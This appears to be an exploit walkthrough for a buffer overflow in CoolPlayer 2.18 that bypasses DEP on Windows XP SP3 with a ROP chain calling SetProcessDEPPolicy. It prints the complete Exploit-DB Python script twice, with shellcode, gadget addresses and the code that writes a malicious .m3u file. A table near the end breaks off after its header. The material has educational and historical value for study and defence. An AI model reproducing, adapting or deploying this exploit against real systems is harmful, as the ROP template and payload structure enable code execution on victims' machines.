CoolPlayer 2.18 DEP Bypass Exploit Explained

What this paper is

This paper describes a local exploit for CoolPlayer version 2.18. The exploit targets a buffer overflow vulnerability and uses it to bypass Data Execution Prevention (DEP) by calling the SetProcessDEPPolicy() function. This function allows the attacker to disable DEP for the running process, enabling the execution of arbitrary shellcode.

Simple technical breakdown

The exploit works by:

1. Overflowing a buffer: A vulnerability in CoolPlayer allows an attacker to write more data than expected into a buffer. This overwrites adjacent memory.
2. Hijacking control flow: By carefully crafting the overflow data, the attacker overwrites the return address on the stack. This return address is used by the program to know where to resume execution after a function finishes. The attacker replaces it with an address that points to their malicious code.
3. Bypassing DEP: Instead of directly executing shellcode, this exploit uses a technique called Return-Oriented Programming (ROP). It chains together small pieces of existing executable code (called "gadgets") within the program's loaded libraries. These gadgets are used to set up the arguments for a specific Windows API function.
4. Disabling DEP: The ROP chain is designed to call SetProcessDEPPolicy(0). This function, when called with 0, disables DEP for the current process.
5. Executing shellcode: Once DEP is disabled, the exploit then jumps to and executes the actual shellcode, which in this case is designed to launch calc.exe.

Complete code and payload walkthrough

The Python script generates a malicious .m3u file. Let's break down its components:

# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\xc3\x77\x17\x09\xcc\xdb"
"\xdb\x0b\xb0\x21\x08\xec\x89\xea\x5d\xed\xce\x16\xad\xbf\x87"
"\x5d\x1c\x50\xa3\x23\x9d\x51\x63\x28\x9d\x29\x06\xee\x6a\x80"
"\x09\x3e\xc2\x9f\x42\xa6\x68\xc7\x72\xd7\xbd\x1b\x4e\x9e\xca"
"\xe8\x24\x21\x1b\x21\xc4\x10\x63\xee\xfb\x9d\x6e\xee\x3c\x19"
"\x91\x85\x36\x5a\x2c\x9e\x8c\x21\xea\x2b\x11\x81\x79\x8b\xf1"
"\x30\xad\x4a\x71\x3e\x1a\x18\xdd\x22\x9d\xcd\x55\x5e\x16\xf0"
"\xb9\xd7\x6c\xd7\x1d\xbc\x37\x76\x07\x18\x99\x87\x57\xc4\x46"
"\x22\x13\xe6\x93\x54\x7e\x6c\x65\xd4\x04\xc9\x65\xe6\x06\x79"
"\x0e\xd7\x8d\x16\x49\xe8\x47\x53\xab\x19\x5a\x49\x3c\x80\x0f"
"\x30\x20\x33\xfa\x76\x5d\xb0\x0f\x06\x9a\xa8\x65\x03\xe6\x6e"
"\x95\x79\x77\x1b\x99\x2e\x78\x0e\xfa\xb1\xea\xd2\xd3\x54\x8b"
"\x71\x2c")

• shellcode: This is the actual payload. It's a sequence of bytes generated by Metasploit (likely windows/exec CMD=calc.exe). Its purpose is to execute the calc.exe program once it's safe to do so (i.e., after DEP is disabled). The comment indicates it's around 227-240 bytes.

buffer = "\x41" * 220
eip = "\x28\xb0\x9f\x7c"				# POP ECX / RETN - SHELL32.DLL 7C9FB028
offset1 = "\x42" * 4
nop = "\x90" * 10

• buffer: "\x41" * 220 represents 220 bytes of 'A' characters. This is the initial part of the overflow data. It's designed to fill the vulnerable buffer and reach the saved return address on the stack.
• eip: "\x28\xb0\x9f\x7c" is the address 0x7c9fb028. This address points to a POP ECX / RETN gadget within SHELL32.DLL. This gadget is crucial for the ROP chain. It pops a value into the ECX register and then returns, allowing control to flow to the next instruction.
• offset1: "\x42" * 4 represents 4 bytes of 'B' characters. This is padding to ensure the ROP chain starts at the correct offset after overwriting the return address.
• nop: "\x90" * 10 represents 10 bytes of No-Operation instructions. These are often used as a landing pad for shellcode or to align execution flow.

# put zero in EBX
rop = "\xdd\xad\x9e\x7c"				# POP EBX / RETN - SHELL32.DLL 7C9EADDD
rop += "\xff\xff\xff\xff"				# placed into ebx
rop += "\xe1\x27\xc1\x77"				# INC EBX / RETN - MSVCRT.DLL 77C127E1

• rop: This section starts building the Return-Oriented Programming (ROP) chain.
  • "\xdd\xad\x9e\x7c": This is the address 0x7c9eaddd, pointing to a POP EBX / RETN gadget in SHELL32.DLL. It pops a value from the stack into the EBX register.
  • "\xff\xff\xff\xff": This value (0xffffffff) is popped into EBX. In this context, it's used to set EBX to a value that, when incremented, will result in 0.
  • "\xe1\x27\xc1\x77": This is the address 0x77c127e1, pointing to an INC EBX / RETN gadget in MSVCRT.DLL. This instruction increments the value in EBX. Since EBX was 0xffffffff, incrementing it results in 0. This effectively sets EBX to zero, which is a requirement for calling SetProcessDEPPolicy with the argument 0 (to disable DEP).

# set EBP to point to SetProcessDEPPolicy
rop += "\x7b\xa6\x9e\x7c"				# POP EBP / RETN - SHELL32.DLL 7C9EA67B
rop += "\xa4\x22\x86\x7c"				# address of SetProcessDEPPolicy XP SP3

• Setting up EBP:
  • "\x7b\xa6\x9e\x7c": This is the address 0x7c9ea67b, a POP EBP / RETN gadget in SHELL32.DLL. It pops a value into the EBP register.
  • "\xa4\x22\x86\x7c": This is the address 0x7c8622a4, which is the address of the SetProcessDEPPolicy function on Windows XP SP3. This address will be popped into EBP. The ROP chain is structured such that EBP will eventually be used to point to the function to be called.

# set EDI as a pointer to RET (rop nop)
rop += "\x47\xeb\x9e\x7c"				# POP EDI / RETN - SHELL32.DLL 7C9EEB47
rop += "\x08\x15\x9c\x7c"				# RETN - SHELL32.DLL 7C9C1508			

# set ESI as a pointer to RET (rop nop)
rop += "\x4c\x20\x9c\x7c"				# POP ESI / RETN - SHELL32.DLL 7C9C204C
rop += "\x51\x20\x9c\x7c"				# RETN - SHELL32.DLL 7C9C2051			

• Setting up EDI and ESI: These instructions are setting up EDI and ESI registers. While not explicitly used for the SetProcessDEPPolicy call itself in this specific ROP chain, they are often populated in ROP chains for various purposes, such as preparing for memory operations or other function calls.
  • "\x47\xeb\x9e\x7c": POP EDI / RETN gadget (0x7c9eeb47).
  • "\x08\x15\x9c\x7c": A RETN instruction (0x7c9c1508) which will be placed into EDI.
  • "\x4c\x20\x9c\x7c": POP ESI / RETN gadget (0x7c9c204c).
  • "\x51\x20\x9c\x7c": A RETN instruction (0x7c9c2051) which will be placed into ESI.

# set ESP to point at nops
rop += "\x73\x10\xa1\x7c"				# PUSHAD / RETN - SHELL32.DLL 7CA11073

• PUSHAD / RETN:
  • "\x73\x10\xa1\x7c": This is the address 0x7ca11073, pointing to a PUSHAD / RETN gadget in SHELL32.DLL. The PUSHAD instruction pushes the values of all general-purpose registers (EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI) onto the stack. The RETN then pops the next address from the stack and jumps to it. This gadget is used to set up the stack pointer (ESP) to point to the area containing the NOP sled and the shellcode.

The ROP Chain Execution Flow (Simplified):

1. The overflow overwrites the return address with the address of the first ROP gadget.
2. The program jumps to the first gadget.
3. The ROP chain executes sequentially. Each gadget performs its action (e.g., POP EBX, INC EBX, POP EBP) and then executes RETN.
4. The RETN instruction pops the next address from the stack, which is the address of the next ROP gadget, thus chaining them together.
5. The chain eventually sets up EBX to 0, EBP to the address of SetProcessDEPPolicy, and prepares the stack pointer (ESP) to point to the NOP sled and shellcode.
6. A specific gadget (likely implied by the overall ROP structure, though not explicitly shown as a final call instruction in the provided snippet) would then be responsible for calling the function pointed to by EBP with the argument in EBX. This would be SetProcessDEPPolicy(0).
7. After SetProcessDEPPolicy(0) returns, the execution flow would continue to the NOP sled ("\x90" * 10) and then to the actual shellcode.
8. The shellcode executes, launching calc.exe.

Mapping of Code Fragments to Practical Purpose:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines

print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"

# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\xc3\x77\x17\x09\xcc\xdb"
"\xdb\x0b\xb0\x21\x08\xec\x89\xea\x5d\xed\xce\x16\xad\xbf\x87"
"\x5d\x1c\x50\xa3\x23\x9d\x51\x63\x28\x9d\x29\x06\xee\x6a\x80"
"\x09\x3e\xc2\x9f\x42\xa6\x68\xc7\x72\xd7\xbd\x1b\x4e\x9e\xca"
"\xe8\x24\x21\x1b\x21\xc4\x10\x63\xee\xfb\x9d\x6e\xee\x3c\x19"
"\x91\x85\x36\x5a\x2c\x9e\x8c\x21\xea\x2b\x11\x81\x79\x8b\xf1"
"\x30\xad\x4a\x71\x3e\x1a\x18\xdd\x22\x9d\xcd\x55\x5e\x16\xf0"
"\xb9\xd7\x6c\xd7\x1d\xbc\x37\x76\x07\x18\x99\x87\x57\xc4\x46"
"\x22\x13\xe6\x93\x54\x7e\x6c\x65\xd4\x04\xc9\x65\xe6\x06\x79"
"\x0e\xd7\x8d\x16\x49\xe8\x47\x53\xab\x19\x5a\x49\x3c\x80\x0f"
"\x30\x20\x33\xfa\x76\x5d\xb0\x0f\x06\x9a\xa8\x65\x03\xe6\x6e"
"\x95\x79\x77\x1b\x99\x2e\x78\x0e\xfa\xb1\xea\xd2\xd3\x54\x8b"
"\x71\x2c")


buffer = "\x41" * 220
eip = "\x28\xb0\x9f\x7c"				# POP ECX / RETN - SHELL32.DLL 7C9FB028
offset1 = "\x42" * 4
nop = "\x90" * 10

# put zero in EBX
rop = "\xdd\xad\x9e\x7c"				# POP EBX / RETN - SHELL32.DLL 7C9EADDD
rop += "\xff\xff\xff\xff"				# placed into ebx
rop += "\xe1\x27\xc1\x77"				# INC EBX / RETN - MSVCRT.DLL 77C127E1

# set EBP to point to SetProcessDEPPolicy
rop += "\x7b\xa6\x9e\x7c"				# POP EBP / RETN - SHELL32.DLL 7C9EA67B
rop += "\xa4\x22\x86\x7c"				# address of SetProcessDEPPolicy XP SP3

# set EDI as a pointer to RET (rop nop)
rop += "\x47\xeb\x9e\x7c"				# POP EDI / RETN - SHELL32.DLL 7C9EEB47
rop += "\x08\x15\x9c\x7c"				# RETN - SHELL32.DLL 7C9C1508			

# set ESI as a pointer to RET (rop nop)
rop += "\x4c\x20\x9c\x7c"				# POP ESI / RETN - SHELL32.DLL 7C9C204C
rop += "\x51\x20\x9c\x7c"				# RETN - SHELL32.DLL 7C9C2051			

# set ESP to point at nops
rop += "\x73\x10\xa1\x7c"				# PUSHAD / RETN - SHELL32.DLL 7CA11073

print "[*] Creating malicious m3u file"
try:
	file = open("exploit.m3u","w")
	file.write(buffer + eip + offset1 + rop + nop + shellcode)
	file.close()
	print "[*] File created"
except:
	print "[x] Error creating file!"

raw_input("\nPress any key to exit...")